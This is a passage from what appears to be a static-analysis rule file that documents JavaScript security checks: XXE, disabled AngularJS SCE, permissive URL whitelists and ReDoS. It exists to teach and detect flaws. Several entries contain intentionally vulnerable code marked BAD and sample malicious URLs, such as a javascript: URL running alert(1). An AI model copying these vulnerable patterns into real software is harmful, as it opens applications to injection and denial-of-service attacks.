be expanded in a separate step using utility functions provided by libraries such as [underscore](http://underscorejs.org/#unescape), [lodash](https://lodash.com/docs/4.17.15#unescape) or [he](https://github.com/mathiasbynens/he).\n\n\n```javascript\nconst app = require(\"express\")(),\n  libxml = require(\"libxmljs\");\n\napp.post(\"upload\", (req, res) => {\n  let xmlSrc = req.body,\n    doc = libxml.parseXml(xmlSrc);\n});\n\n```\n\n## References\n* OWASP: [XML External Entity (XXE) Processing](https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Processing).\n* Timothy Morgen: [XML Schema, DTD, and Entity Attacks](https://research.nccgroup.com/2014/05/19/xml-schema-dtd-and-entity-attacks-a-compendium-of-known-techniques/).\n* Timur Yunusov, Alexey Osipov: [XML Out-Of-Band Data Retrieval](https://www.slideshare.net/qqlan/bh-ready-v4).\n* Common Weakness Enumeration: [CWE-611](https://cwe.mitre.org/data/definitions/611.html).\n* Common Weakness Enumeration: [CWE-827](https://cwe.mitre.org/data/definitions/827.html).\n","markdown":"# XML external entity expansion\nParsing untrusted XML files with a weakly configured XML parser may lead to an XML External Entity (XXE) attack. This type of attack uses external entity references to access arbitrary files on a system, carry out denial-of-service (DoS) attacks, or server-side request forgery. Even when the result of parsing is not returned to the user, DoS attacks are still possible and out-of-band data retrieval techniques may allow attackers to steal sensitive data.\n\n\n## Recommendation\nThe easiest way to prevent XXE attacks is to disable external entity handling when parsing untrusted data. How this is done depends on the library being used. Note that some libraries, such as recent versions of `libxml`, disable entity expansion by default, so unless you have explicitly enabled entity expansion, no further action needs to be taken.\n\n\n## Example\nThe following example uses the `libxml` XML parser to parse a string `xmlSrc`. If that string is from an untrusted source, this code may be vulnerable to an XXE attack, since the parser is invoked with the `noent` option set to `true`:\n\n\n```javascript\nconst app = require(\"express\")(),\n  libxml = require(\"libxmljs\");\n\napp.post(\"upload\", (req, res) => {\n  let xmlSrc = req.body,\n    doc = libxml.parseXml(xmlSrc, { noent: true });\n});\n\n```\nTo guard against XXE attacks, the `noent` option should be omitted or set to `false`. This means that no entity expansion is undertaken at all, not even for standard internal entities such as `&amp;` or `&gt;`. If desired, these entities can be expanded in a separate step using utility functions provided by libraries such as [underscore](http://underscorejs.org/#unescape), [lodash](https://lodash.com/docs/4.17.15#unescape) or [he](https://github.com/mathiasbynens/he).\n\n\n```javascript\nconst app = require(\"express\")(),\n  libxml = require(\"libxmljs\");\n\napp.post(\"upload\", (req, res) => {\n  let xmlSrc = req.body,\n    doc = libxml.parseXml(xmlSrc);\n});\n\n```\n\n## References\n* OWASP: [XML External Entity (XXE) Processing](https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Processing).\n* Timothy Morgen: [XML Schema, DTD, and Entity Attacks](https://research.nccgroup.com/2014/05/19/xml-schema-dtd-and-entity-attacks-a-compendium-of-known-techniques/).\n* Timur Yunusov, Alexey Osipov: [XML Out-Of-Band Data Retrieval](https://www.slideshare.net/qqlan/bh-ready-v4).\n* Common Weakness Enumeration: [CWE-611](https://cwe.mitre.org/data/definitions/611.html).\n* Common Weakness Enumeration: [CWE-827](https://cwe.mitre.org/data/definitions/827.html).\n"},"properties":{"tags":["security","external/cwe/cwe-611","external/cwe/cwe-827"],"description":"Parsing user input as an XML document with external\n              entity expansion is vulnerable to XXE attacks.","id":"js/xxe","kind":"path-problem","name":"XML external entity expansion","precision":"high","problem.severity":"error","security-severity":"9.1"}},{"id":"js/angular/disabling-sce","name":"js/angular/disabling-sce","shortDescription":{"text":"Disabling SCE"},"fullDescription":{"text":"Disabling strict contextual escaping (SCE) can cause security vulnerabilities."},"defaultConfiguration":{"enabled":true,"level":"warning"},"help":{"text":"# Disabling SCE\nAngularJS is secure by default through automated sanitization and filtering of untrusted values that could cause vulnerabilities such as XSS. Strict Contextual Escaping (SCE) is an execution mode in AngularJS that provides this security mechanism.\n\nDisabling SCE in an AngularJS application is strongly discouraged. It is even more discouraged to disable SCE in a library, since it is an application-wide setting.\n\n\n## Recommendation\nDo not disable SCE.\n\n\n## Example\nThe following example shows an AngularJS application that disables SCE in order to dynamically construct an HTML fragment, which is later inserted into the DOM through `$scope.html`.\n\n\n```javascript\nangular.module('app', [])\n    .config(function($sceProvider) {\n        $sceProvider.enabled(false); // BAD\n    }).controller('controller', function($scope) {\n        // ...\n        $scope.html = '<ul><li>' + item.toString() + '</li></ul>';\n    });\n\n```\nThis is problematic, since it disables SCE for the entire AngularJS application.\n\nInstead, just mark the dynamically constructed HTML fragment as safe using `$sce.trustAsHtml`, before assigning it to `$scope.html`:\n\n\n```javascript\nangular.module('app', [])\n    .controller('controller', function($scope, $sce) {\n        // ...\n        // GOOD (but should use the templating system instead)\n        $scope.html = $sce.trustAsHtml('<ul><li>' + item.toString() + '</li></ul>'); \n    });\n\n```\nPlease note that this example is for illustrative purposes only; use the AngularJS templating system to dynamically construct HTML when possible.\n\n\n## References\n* AngularJS Developer Guide: [Strict Contextual Escaping](https://docs.angularjs.org/api/ng/service/$sce)\n* AngularJS Developer Guide: [Can I disable SCE completely?](https://docs.angularjs.org/api/ng/service/$sce#can-i-disable-sce-completely-).\n* Common Weakness Enumeration: [CWE-116](https://cwe.mitre.org/data/definitions/116.html).\n","markdown":"# Disabling SCE\nAngularJS is secure by default through automated sanitization and filtering of untrusted values that could cause vulnerabilities such as XSS. Strict Contextual Escaping (SCE) is an execution mode in AngularJS that provides this security mechanism.\n\nDisabling SCE in an AngularJS application is strongly discouraged. It is even more discouraged to disable SCE in a library, since it is an application-wide setting.\n\n\n## Recommendation\nDo not disable SCE.\n\n\n## Example\nThe following example shows an AngularJS application that disables SCE in order to dynamically construct an HTML fragment, which is later inserted into the DOM through `$scope.html`.\n\n\n```javascript\nangular.module('app', [])\n    .config(function($sceProvider) {\n        $sceProvider.enabled(false); // BAD\n    }).controller('controller', function($scope) {\n        // ...\n        $scope.html = '<ul><li>' + item.toString() + '</li></ul>';\n    });\n\n```\nThis is problematic, since it disables SCE for the entire AngularJS application.\n\nInstead, just mark the dynamically constructed HTML fragment as safe using `$sce.trustAsHtml`, before assigning it to `$scope.html`:\n\n\n```javascript\nangular.module('app', [])\n    .controller('controller', function($scope, $sce) {\n        // ...\n        // GOOD (but should use the templating system instead)\n        $scope.html = $sce.trustAsHtml('<ul><li>' + item.toString() + '</li></ul>'); \n    });\n\n```\nPlease note that this example is for illustrative purposes only; use the AngularJS templating system to dynamically construct HTML when possible.\n\n\n## References\n* AngularJS Developer Guide: [Strict Contextual Escaping](https://docs.angularjs.org/api/ng/service/$sce)\n* AngularJS Developer Guide: [Can I disable SCE completely?](https://docs.angularjs.org/api/ng/service/$sce#can-i-disable-sce-completely-).\n* Common Weakness Enumeration: [CWE-116](https://cwe.mitre.org/data/definitions/116.html).\n"},"properties":{"tags":["security","maintainability","frameworks/angularjs","external/cwe/cwe-116"],"description":"Disabling strict contextual escaping (SCE) can cause security vulnerabilities.","id":"js/angular/disabling-sce","kind":"problem","name":"Disabling SCE","precision":"very-high","problem.severity":"warning","security-severity":"7.8"}},{"id":"js/angular/double-compilation","name":"js/angular/double-compilation","shortDescription":{"text":"Double compilation"},"fullDescription":{"text":"Recompiling an already compiled part of the DOM can lead to unexpected behavior of directives, performance problems, and memory leaks."},"defaultConfiguration":{"enabled":true,"level":"warning"},"help":{"text":"# Double compilation\nThe AngularJS compiler processes (parts of) the DOM, determining which directives match which DOM elements, and then applies the directives to the elements. Each DOM element should only be compiled once, otherwise unexpected behavior may result.\n\n\n## Recommendation\nOnly compile new DOM elements.\n\n\n## Example\nThe following example (adapted from the AngularJS developer guide) shows a directive that adds a tooltip to a DOM element, and then compiles the entire element to apply nested directives.\n\n\n```javascript\nangular.module('myapp')\n       .directive('addToolTip', function($compile) {\n  return {\n    link: function(scope, element, attrs) {\n      var tooltip = angular.element('<span ng-show=\"showToolTip\">A tooltip</span>');\n      tooltip.on('mouseenter mouseleave', function() {\n        scope.$apply('showToolTip = !showToolTip');\n      });\n      element.append(tooltip);\n      $compile(element)(scope); // NOT OK\n    }\n  };\n});\n\n```\nThis is problematic, since it will recompile all of `element`, including parts that have already been compiled.\n\nInstead, only the new element should be compiled:\n\n\n```javascript\nangular.module('myapp')\n       .directive('addToolTip', function($compile) {\n  return {\n    link: function(scope, element, attrs) {\n      var tooltip = angular.element('<span ng-show=\"showToolTip\">A tooltip</span>');\n      tooltip.on('mouseenter mouseleave', function() {\n        scope.$apply('showToolTip = !showToolTip');\n      });\n      element.append(tooltip);\n      $compile(tooltip)(scope); // OK\n    }\n  };\n});\n\n```\n\n## References\n* AngularJS Developer Guide: [Double Compilation, and how to avoid it](https://docs.angularjs.org/guide/compiler#double-compilation-and-how-to-avoid-it).\n* Common Weakness Enumeration: [CWE-1176](https://cwe.mitre.org/data/definitions/1176.html).\n","markdown":"# Double compilation\nThe AngularJS compiler processes (parts of) the DOM, determining which directives match which DOM elements, and then applies the directives to the elements. Each DOM element should only be compiled once, otherwise unexpected behavior may result.\n\n\n## Recommendation\nOnly compile new DOM elements.\n\n\n## Example\nThe following example (adapted from the AngularJS developer guide) shows a directive that adds a tooltip to a DOM element, and then compiles the entire element to apply nested directives.\n\n\n```javascript\nangular.module('myapp')\n       .directive('addToolTip', function($compile) {\n  return {\n    link: function(scope, element, attrs) {\n      var tooltip = angular.element('<span ng-show=\"showToolTip\">A tooltip</span>');\n      tooltip.on('mouseenter mouseleave', function() {\n        scope.$apply('showToolTip = !showToolTip');\n      });\n      element.append(tooltip);\n      $compile(element)(scope); // NOT OK\n    }\n  };\n});\n\n```\nThis is problematic, since it will recompile all of `element`, including parts that have already been compiled.\n\nInstead, only the new element should be compiled:\n\n\n```javascript\nangular.module('myapp')\n       .directive('addToolTip', function($compile) {\n  return {\n    link: function(scope, element, attrs) {\n      var tooltip = angular.element('<span ng-show=\"showToolTip\">A tooltip</span>');\n      tooltip.on('mouseenter mouseleave', function() {\n        scope.$apply('showToolTip = !showToolTip');\n      });\n      element.append(tooltip);\n      $compile(tooltip)(scope); // OK\n    }\n  };\n});\n\n```\n\n## References\n* AngularJS Developer Guide: [Double Compilation, and how to avoid it](https://docs.angularjs.org/guide/compiler#double-compilation-and-how-to-avoid-it).\n* Common Weakness Enumeration: [CWE-1176](https://cwe.mitre.org/data/definitions/1176.html).\n"},"properties":{"tags":["reliability","frameworks/angularjs","security","external/cwe/cwe-1176"],"description":"Recompiling an already compiled part of the DOM can lead to\n              unexpected behavior of directives, performance problems, and memory leaks.","id":"js/angular/double-compilation","kind":"problem","name":"Double compilation","precision":"very-high","problem.severity":"warning","security-severity":"8.8"}},{"id":"js/angular/insecure-url-whitelist","name":"js/angular/insecure-url-whitelist","shortDescription":{"text":"Insecure URL whitelist"},"fullDescription":{"text":"URL whitelists that are too permissive can cause security vulnerabilities."},"defaultConfiguration":{"enabled":true,"level":"warning"},"help":{"text":"# Insecure URL whitelist\nAngularJS uses filters to ensure that the URLs used for sourcing AngularJS templates and other script-running URLs are safe. One such filter is a whitelist of URL patterns to allow.\n\nA URL pattern that is too permissive can cause security vulnerabilities.\n\n\n## Recommendation\nMake the whitelist URL patterns as restrictive as possible.\n\n\n## Example\nThe following example shows an AngularJS application with whitelist URL patterns that all are too permissive.\n\n\n```javascript\nangular.module('myApp', [])\n    .config(function($sceDelegateProvider) {\n        $sceDelegateProvider.resourceUrlWhitelist([\n            \"*://example.org/*\", // BAD\n            \"https://**.example.com/*\", // BAD\n            \"https://example.**\", // BAD\n            \"https://example.*\" // BAD\n        ]);\n    });\n\n```\nThis is problematic, since the four patterns match the following malicious URLs, respectively:\n\n* `javascript://example.org/a%0A%0Dalert(1)` (`%0A%0D` is a linebreak)\n* `https://evil.com/?ignore=://example.com/a`\n* `https://example.evil.com`\n* `https://example.evilTld`\n\n## References\n* OWASP/Google presentation: [Securing AngularJS Applications](https://www.owasp.org/images/6/6e/Benelus_day_20161125_S_Lekies_Securing_AngularJS_Applications.pdf)\n* AngularJS Developer Guide: [Format of items in resourceUrlWhitelist/Blacklist](https://docs.angularjs.org/api/ng/service/$sce#resourceUrlPatternItem).\n* Common Weakness Enumeration: [CWE-183](https://cwe.mitre.org/data/definitions/183.html).\n* Common Weakness Enumeration: [CWE-625](https://cwe.mitre.org/data/definitions/625.html).\n","markdown":"# Insecure URL whitelist\nAngularJS uses filters to ensure that the URLs used for sourcing AngularJS templates and other script-running URLs are safe. One such filter is a whitelist of URL patterns to allow.\n\nA URL pattern that is too permissive can cause security vulnerabilities.\n\n\n## Recommendation\nMake the whitelist URL patterns as restrictive as possible.\n\n\n## Example\nThe following example shows an AngularJS application with whitelist URL patterns that all are too permissive.\n\n\n```javascript\nangular.module('myApp', [])\n    .config(function($sceDelegateProvider) {\n        $sceDelegateProvider.resourceUrlWhitelist([\n            \"*://example.org/*\", // BAD\n            \"https://**.example.com/*\", // BAD\n            \"https://example.**\", // BAD\n            \"https://example.*\" // BAD\n        ]);\n    });\n\n```\nThis is problematic, since the four patterns match the following malicious URLs, respectively:\n\n* `javascript://example.org/a%0A%0Dalert(1)` (`%0A%0D` is a linebreak)\n* `https://evil.com/?ignore=://example.com/a`\n* `https://example.evil.com`\n* `https://example.evilTld`\n\n## References\n* OWASP/Google presentation: [Securing AngularJS Applications](https://www.owasp.org/images/6/6e/Benelus_day_20161125_S_Lekies_Securing_AngularJS_Applications.pdf)\n* AngularJS Developer Guide: [Format of items in resourceUrlWhitelist/Blacklist](https://docs.angularjs.org/api/ng/service/$sce#resourceUrlPatternItem).\n* Common Weakness Enumeration: [CWE-183](https://cwe.mitre.org/data/definitions/183.html).\n* Common Weakness Enumeration: [CWE-625](https://cwe.mitre.org/data/definitions/625.html).\n"},"properties":{"tags":["security","frameworks/angularjs","external/cwe/cwe-183","external/cwe/cwe-625"],"description":"URL whitelists that are too permissive can cause security vulnerabilities.","id":"js/angular/insecure-url-whitelist","kind":"problem","name":"Insecure URL whitelist","precision":"very-high","problem.severity":"warning","security-severity":"7.5"}},{"id":"js/redos","name":"js/redos","shortDescription":{"text":"Inefficient regular expression"},"fullDescription":{"text":"A regular expression that requires exponential time to match certain inputs can be a performance bottleneck, and may be vulnerable to denial-of-service attacks."},"defaultConfiguration":{"enabled":true,"level":"error"},"help":{"text":"# Inefficient regular expression\nSome regular expressions take a long time to match certain input strings to the point where the time it takes to match a string of length *n* is proportional to *n<sup>k</sup>* or even *2<sup>n</sup>*. Such regular expressions can negatively affect performance, or even allow a malicious user to perform a Denial of Service (\"DoS\") attack by crafting an expensive input string for the regular expression to match.\n\nThe regular expression engines provided by many popular JavaScript platforms use backtracking non-deterministic finite automata to implement regular expression matching. While this approach is space-efficient and allows supporting advanced features like capture groups, it is not time-efficient in general. The worst-case time complexity of such an automaton can be polynomial or even exponential, meaning that for strings of a certain shape, increasing the input length by ten characters may make the automaton about 1000 times slower.\n\nTypically, a regular expression is affected by this problem if it contains a repetition of the form `r*` or `r+` where the sub-expression `r` is ambiguous in the sense that it can match some string in multiple ways. More information about the precise circumstances can be found in the references.\n\n\n## Recommendation\nModify the regular expression to remove the ambiguity, or ensure that the strings matched with the regular expression are short enough that the time-complexity does not matter.\n\n\n## Example\nConsider this regular expression:\n\n```javascript\n\n/^_(__|.)+_$/\n```\nIts sub-expression `\"(__|.)+?\"` can match the string `\"__\"` either by the first alternative `\"__\"` to the left of the `\"|\"` operator, or by two repetitions of the second alternative `\".\"` to the right. Thus, a string consisting of an odd number of underscores followed by some other character will cause the regular expression engine to run for an exponential amount of time before rejecting the input.\n\nThis problem can be avoided by rewriting the regular expression to remove the ambiguity between the two branches of the alternative inside the repetition:\n\n```javascript\n\n/^_(__|[^_])+_$/\n```\n\n## References\n* OWASP: [Regular expression Denial of Service - ReDoS](https://www.owasp.org/index.php/Regular_expression_Denial_of_Service_-_ReDoS).\n* Wikipedia: [ReDoS](https://en.wikipedia.org/wiki/ReDoS).\n* Wikipedia: [Time complexity](https://en.wikipedia.org/wiki/Time_complexity).\n* James Kirrage, Asiri Rathnayake, Hayo Thielecke: [Static Analysis for Regular Expression Denial-of-Service Attack](https://arxiv.org/abs/1301.0849).\n* Common Weakness Enumeration: [CWE-1333](https://cwe.mitre.org/data/definitions/1333.html).\n* Common Weakness Enumeration: [CWE-730](https://cwe.mitre.org/data/definitions/730.html).\n* Common Weakness Enumeration: [CWE-400](https://cwe.mitre.org/data/definitions/400.html).\n","markdown":"# Inefficient regular expression\nSome regular expressions take a long time to match certain input strings to the point where the time it takes to match a string of length *n* is proportional to *n<sup>k</sup>* or even *2<sup>n</sup>*. Such regular expressions can negatively affect performance, or even allow a malicious user to perform a Denial of Service (\"DoS\") attack by crafting an expensive input string for the regular expression to match.\n\nThe regular expression engines provided by many popular JavaScript platforms use backtracking non-deterministic finite automata to implement regular expression matching. While this approach is space-efficient and allows supporting advanced features like capture groups, it is not time-efficient in general. The worst-case time complexity of such an automaton can be polynomial or even exponential, meaning that for strings of a certain shape, increasing the input length by ten characters may make the automaton about 1000 times slower.\n\nTypically, a regular expression is affected by this problem if it contains a repetition of the form `r*` or `r+` where the sub-expression `r` is ambiguous in the sense that it can match some string in multiple ways. More information about the precise circumstances can be found in the references.\n\n\n## Recommendation\nModify the regular expression to remove the ambiguity, or ensure that the strings matched with the regular expression are short enough that the time-complexity does not matter.\n\n\n## Example\nConsider this regular expression:\n\n```javascript\n\n/^_(__|.)+_$/\n```\nIts sub-expression `\"(__|.)+?\"` can match the string `\"__\"` either by the first alternative `\"__\"` to the left of the `\"|\"` operator, or by two repetitions of the second alternative `\".\"` to the right. Thus, a string consisting of an odd number of underscores followed by some other character will cause the regular expression engine to run for an exponential amount of time before rejecting the input.\n\nThis problem can be avoided by rewriting the regular expression to remove the ambiguity between the two branches of the alternative inside the repetition:\n\n```javascript\n\n/^_(__|[^_])+_$/\n```\n\n## References\n* OWASP: [Regular expression Denial of Service - ReDoS](https://www.owasp.org/index.php/Regular_expression_Denial_of_Service_-_ReDoS).\n* Wikipedia: [ReDoS](https://en.wikipedia.org/wiki/ReDoS).\n* Wikipedia: [Time complexity](https://en.wikipedia.org/wiki/Time_complexity).\n* James Kirrage, Asiri Rathnayake, Hayo Thielecke: [Static Analysis for Regular Expression Denial-of-Service Attack](https://arxiv.org/abs/1301.0849).\n* Common Weakness Enumeration: [CWE-1333](https://cwe.mitre.org/data/definitions/1333.html).\n* Common Weakness Enumeration: [CWE-730](https://cwe.mitre.org/data/definitions/730.html).\n* Common Weakness Enumeration: [CWE-400](https://cwe.mitre.org/data/definitions/400.html).\n"},"properties":{"tags":["security","external/cwe/cwe-1333","external/cwe/cwe-730","external/cwe/cwe-400"],"description":"A regular expression that requires exponential time to match certain inputs\n              can be a performance bottleneck, and may be vulnerable to denial-of-service\n              attacks.","id":"js/redos","kind":"problem","name":"Inefficient regular expression","precision":"high","problem.severity":"error","security-severity":"7.5"}},{"id":"js/polynomial-redos","name":"js/polynomial-redos","shortDescription":{"text":"Polynomial regular expression used on uncontrolled data"},"fullDescription":{"text":"A regular expression that can require polynomial time to match may be vulnerable to denial-of-service attacks."},"defaultConfiguration":{"enabled":true,"level":"warning"},"help":{"text":"# Polynomial regular expression used on uncontrolled data\nSome regular expressions take a long time to match certain input strings to the point where the time it takes to match a string of length *n* is proportional to *n<sup>k</sup>* or even *2<sup>n</sup>*. Such regular expressions can negatively affect performance, or even allow a malicious user to perform a Denial of Service (\"DoS\") attack by crafting an expensive input string for the regular expression to match.\n\nThe regular expression engines provided by many popular JavaScript platforms use backtracking non-deterministic finite automata to implement regular expression matching. While this approach is space-efficient and allows supporting advanced features like capture groups, it is not time-efficient in general. The worst-case time complexity of such an automaton can be polynomial or even exponential, meaning that for strings of a certain shape, increasing the input length by ten characters may make the automaton about 1000 times slower.\n\nTypically, a regular expression is affected by this problem if it contains a repetition of the form `r*` or `r+` where the sub-expression `r` is ambiguous in the sense that it can match some string in multiple ways. More information about the precise circumstances can be found in the references.\n\n\n## Recommendation\nModify the regular expression to remove the ambiguity, or ensure that the strings matched with the regular expression are short enough that the time-complexity does not matter.\n\n\n## Example\nConsider this use of a regular expression, which removes all leading and trailing whitespace in a string:\n\n```javascript\n\ntext.replace(/^\\s+|\\s+$/g, ''); // BAD\n```\nThe sub-expression `\"\\s+$\"` will match the whitespace characters in `text` from left to right, but it can start matching anywhere within a whitespace sequence. This is problematic for strings that do **not** end with a whitespace character. Such a string will force the regular expression engine to process each whitespace sequence once per whitespace character in the sequence.\n\nThis ultimately means that the time cost of trimming a string is quadratic in the length of the string. So a string like `\"a b\"` will take milliseconds to process, but a similar string with a million spaces instead of just one will take several minutes.\n\nAvoid this problem by rewriting the regular expression to not contain the ambiguity about when to start matching whitespace sequences. For instance, by using a negative look-behind (`/^\\s+|(?<!\\s)\\s+$/g`), or just by using the built-in trim method (`text.trim()`).\n\nNote that the sub-expression `\"^\\s+\"` is **not** problematic as the `^` anchor restricts when that sub-expression can start matching, and as the regular expression engine matches from left to right.\n\n\n## Example\nAs a similar, but slightly subtler problem, consider the regular expression that matches lines with numbers, possibly written using scientific notation:\n\n```javascript\n\n/^0\\.\\d+E?\\d+$/.test(str) // BAD\n```\nThe problem with this regular expression is in the sub-expression `\\d+E?\\d+` because the second `\\d+` can start matching digits anywhere after the first match of the first `\\d+` if there is no `E` in the input string.\n\nThis is problematic for strings that do **not** end with a digit. Such a string will force the regular expression engine to process each digit sequence once per digit in the sequence, again leading to a quadratic time complexity.\n\nTo make the processing faster, the regular expression should be rewritten such that the two `\\d+` sub-expressions do not have overlapping matches: `^0\\.\\d+(E\\d+)?$`.\n\n\n## Example\nSometimes it is unclear how a regular expression can be rewritten to avoid the problem. In such cases, it often suffices to limit the length of the input string. For instance, the following regular expression is used to match numbers, and on some non-number inputs it can have quadratic time complexity:\n\n```javascript\n\n/^(\\+|-)?(\\d+|(\\d*\\.\\d*))?(E|e)?([-+])?(\\d+)?$/.test(str) // BAD\n```\nIt is not immediately obvious how to rewrite this regular expression to avoid the problem. However, you can mitigate performance issues by limiting the length to 1000 characters, which will always finish in a reasonable amount of time.\n\n```javascript\n\nif (str.length > 1000) {\n    throw new Error(\"Input too long\");\n}\n\n/^(\\+|-)?(\\d+|(\\d*\\.\\d*))?(E|e)?([-+])?(\\d+)?$/.test(str)\n```\n\n## References\n* OWASP: [Regular expression Denial of Service - ReDoS](https://www.owasp.org/index.php/Regular_expression_Denial_of_Service_-_ReDoS).\n* Wikipedia: [ReDoS](https://en.wikipedia.org/wiki/ReDoS).\n* Wikipedia: [Time complexity](https://en.wikipedia.org/wiki/Time_complexity).\n* James Kirrage, Asiri Rathnayake, Hayo Thielecke: [Static Analysis for Regular Expression Denial-of-Service Attack](https://arxiv.org/abs/1301.0849).\n* Common Weakness Enumeration: [CWE-1333](https://cwe.mitre.org/data/definitions/1333.html).\n* Common Weakness Enumeration: [CWE-730](https://cwe.mitre.org/data/definitions/730.html).\n* Common Weakness Enumeration: [CWE-400](https://cwe.mitre.org/data/definitions/400.html).\n","markdown":"# Polynomial regular expression used on uncontrolled data\nSome regular expressions take a long time to match certain input strings to the point where the time it takes to match a string of length *n* is proportional to *n<sup>k</sup>* or even *2<sup>n</sup>*. Such regular expressions can negatively affect performance, or even allow a malicious user to perform a Denial of Service (\"DoS\") attack by crafting an expensive input string for the regular expression to match.\n\nThe regular expression engines provided by many popular JavaScript platforms use backtracking non-deterministic finite automata to implement regular expression matching. While this approach is space-efficient and allows supporting advanced features like capture groups, it is not time-efficient in general. The worst-case time complexity of such an automaton can be polynomial or even exponential, meaning that for strings of a certain shape, increasing the input length by ten characters may make the automaton about 1000 times slower.\n\nTypically, a regular expression is affected by this problem if it contains a repetition of the form `r*` or `r+` where the sub-expression `r` is ambiguous in the sense that it can match some string in multiple ways. More information about the precise circumstances can be found in the references.\n\n\n## Recommendation\nModify the regular expression to remove the ambiguity, or ensure that the strings matched with the regular expression are short enough that the time-complexity does not matter.\n\n\n## Example\nConsider this use of a regular expression, which removes all leading and trailing whitespace in a string:\n\n```javascript\n\ntext.replace(/^\\s+|\\s+$/g, ''); // BAD\n```\nThe sub-expression `\"\\s+$\"` will match the whitespace characters in `text` from left to right, but it can start matching anywhere within a whitespace sequence. This is problematic for strings that do **not** end with a whitespace character. Such a string will force the regular expression engine to process each whitespace sequence once per whitespace character in the sequence.\n\nThis ultimately means that the time cost of trimming a string is quadratic in the length of the string. So a string like `\"a b\"` will take milliseconds to process, but a similar string with a million spaces instead of just one will take several minutes.\n\nAvoid this problem by rewriting the regular expression to not contain the ambiguity about when to start matching whitespace sequences. For instance, by using a negative look-behind (`/^\\s+|(?<!\\s)\\s+$/g`), or just by using the built-in trim method (`text.trim()`).\n\nNote that the sub-expression `\"^\\s+\"` is **not** problematic as the `^` anchor restricts when that sub-expression can start matching, and as the regular expression engine matches from left to right.\n\n\n## Example\nAs a similar, but slightly subtler problem, consider the regular expression that matches lines with numbers, possibly written using scientific notation:\n\n```javascript\n\n/^0\\.\\d+E?\\d+$/.test(str) // BAD\n```\nThe problem with this regular expression is in the sub-expression `\\d+E?\\d+` because the second `\\d+` can start matching digits anywhere after the first match of the first `\\d+` if there is no `E` in the input string.\n\nThis is problematic for strings that do **not** end with a digit. Such a string will force the regular expression engine to process each digit sequence once per digit in the sequence, again leading to a quadratic time complexity.\n\nTo make the processing faster, the regular expression should be rewritten such that the two `\\d+` sub-expressions do not have overlapping matches: `^0\\.\\d+(E\\d+)?$`.\n\n\n## Example\nSometimes it is unclear how a regular expression can be rewritten to avoid the problem. In such cases, it often suffices to limit the length of the input string. For instance, the following regular expression is used to match numbers, and on some non-number inputs it can have quadratic time complexity:\n\n```javascript\n\n/^(\\+|-)?(\\d+|(\\d*\\.\\d*))?(E|e)?([-+])?(\\d+)?$/.test(str) // BAD\n```\nIt is not immediately obvious how to rewrite this regular expression to avoid the problem. However, you can mitigate performance issues by limiting the length to 1000 characters, which will always finish in a reasonable amount of time.\n\n```javascript\n\nif (str.length > 1000) {\n    throw new Error(\"Input too long\");\n}\n\n/^(\\+|-)?(\\d+|(\\d*\\.\\d*))?(E|e)?([-+])?(\\d+)?$/.test(str)\n```\n\n## References\n* OWASP: [Regular expression Denial of Service - ReDoS](https://www.owasp.org/index.php/Regular_expression_Denial_of_Service_-_ReDoS).\n* Wikipedia: [ReDoS](https://en.wikipedia.org/wiki/ReDoS).\n* Wikipedia: [Time complexity](https://en.wikipedia.org/wiki/Time_complexity).\n* James Kirrage, Asiri Rathnayake, Hayo Thielecke: [Static Analysis for Regular Expression Denial-of-Service Attack](https://arxiv.org/abs/1301.0849).\n* Common Weakness Enumeration: [CWE-1333](https://cwe.mitre.org/data/definitions/1333.html).\n* Common Weakness Enumeration: [CWE-730](https://cwe.mitre.org/data/definitions/730.html).\n* Common Weakness Enumeration: [CWE-400](https://cwe.mitre.org/data/definitions/400.html).\n"},"properties":{"tags":["security","external/cwe/cwe-1333","external/cwe/cwe-730","external/cwe/cwe-400"],"description":"A regular expression that can require polynomial time\n              to match may be vulnerable to denial-of-service attacks.","id":"js/polynomial-redos","kind":"path-problem","name":"Polynomial regular expression used on uncontrolled data","precision":"high","problem.severity":"warning","security-severity":"7.5"}},{"id":"js/identity-replacement","name":"js/identity-replacement","shortDescription":{"text":"Replacement of a substring with itself"},"fullDescription":{"text":"Replacing a substring with itself has no effect and may indicate a mistake."},"defaultConfiguration":{"enabled":true,"level":"warning"},"help":{"text":"# Replacement of a substring with itself\nReplacing a substring with itself has no effect and usually indicates a mistake, such as misspelling a backslash escape.\n\n\n## Recommendation\nExamine the string replacement to find and correct any typos.\n\n\n## Example\nThe following code snippet attempts to backslash-escape all double quotes in `raw` by replacing all instances of `\"` with `\\\"`:\n\n\n```javascript\nvar escaped = raw.replace(/\"/g, '\\\"');\n\n```\nHowever, the replacement string `'\\\"'` is actually the same as `'\"'`, with `\\\"` interpreted as an identity escape, so the replacement does nothing. Instead, the replacement string should be `'\\\\\"'`:\n\n\n```javascript\nvar escaped = raw.replace(/\"/g, '\\\\\"');\n\n```\n\n## References\n* Mozilla Developer Network: [String escape notation](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/String#Escape_notation).\n* Common Weakness Enumeration: [CWE-116](https://cwe.mitre.org/data/definitions/116.html).\n","markdown":"# Replacement of a substring with itself\nReplacing a substring with itself has no effect and usually indicates a mistake, such as misspelling a backslash escape.\n\n\n## Recommendation\nExamine the string replacement to find and correct any typos.\n\n\n## Example\nThe following code snippet attempts to backslash-escape all double quotes in `raw` by replacing all instances of `\"` with `\\\"`:\n\n\n```javascript\nvar escaped = raw.replace(/\"/g, '\\\"');\n\n```\nHowever, the replacement string `'\\\"'` is actually the same as `'\"'`, with `\\\"` interpreted as an identity escape, so the replacement does nothing. Instead, the replacement string should be `'\\\\\"'`:\n\n\n```javascript\nvar escaped = raw.replace(/\"/g, '\\\\\"');\n\n```\n\n## References\n* Mozilla Developer Network: [String escape notation](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/String#Escape_notation).\n* Common Weakness Enumeration: [CWE-116](https://cwe.mitre.org/data/definitions/116.html).\n"},"properties":{"tags":["correctness","security","external/cwe/cwe-116"],"description":"Replacing a substring with itself has no effect and may indicate a mistake.","id":"js/identity-replacement","kind":"problem","name":"Replacement of a substring with itself","precision":"very-high","problem.severity":"warning","security-severity":"5.0"}},{"id":"js/enabling-electron-insecure-content","name":"js/enabling-electron-insecure-content","shortDescription":{"text":"Enabling Electron allowRunningInsecureContent"},"fullDescription":{"text":"Enabling allowRunningInsecureContent can allow remote code execution."},"defaultConfiguration":{"enabled":true,"level":"error"},"help":{"text":"# Enabling Electron allowRunningInsecureContent\nElectron is secure by default through a policy banning the execution of content loaded over HTTP. Setting the `allowRunningInsecureContent` property of a `webPreferences` object to `true` will 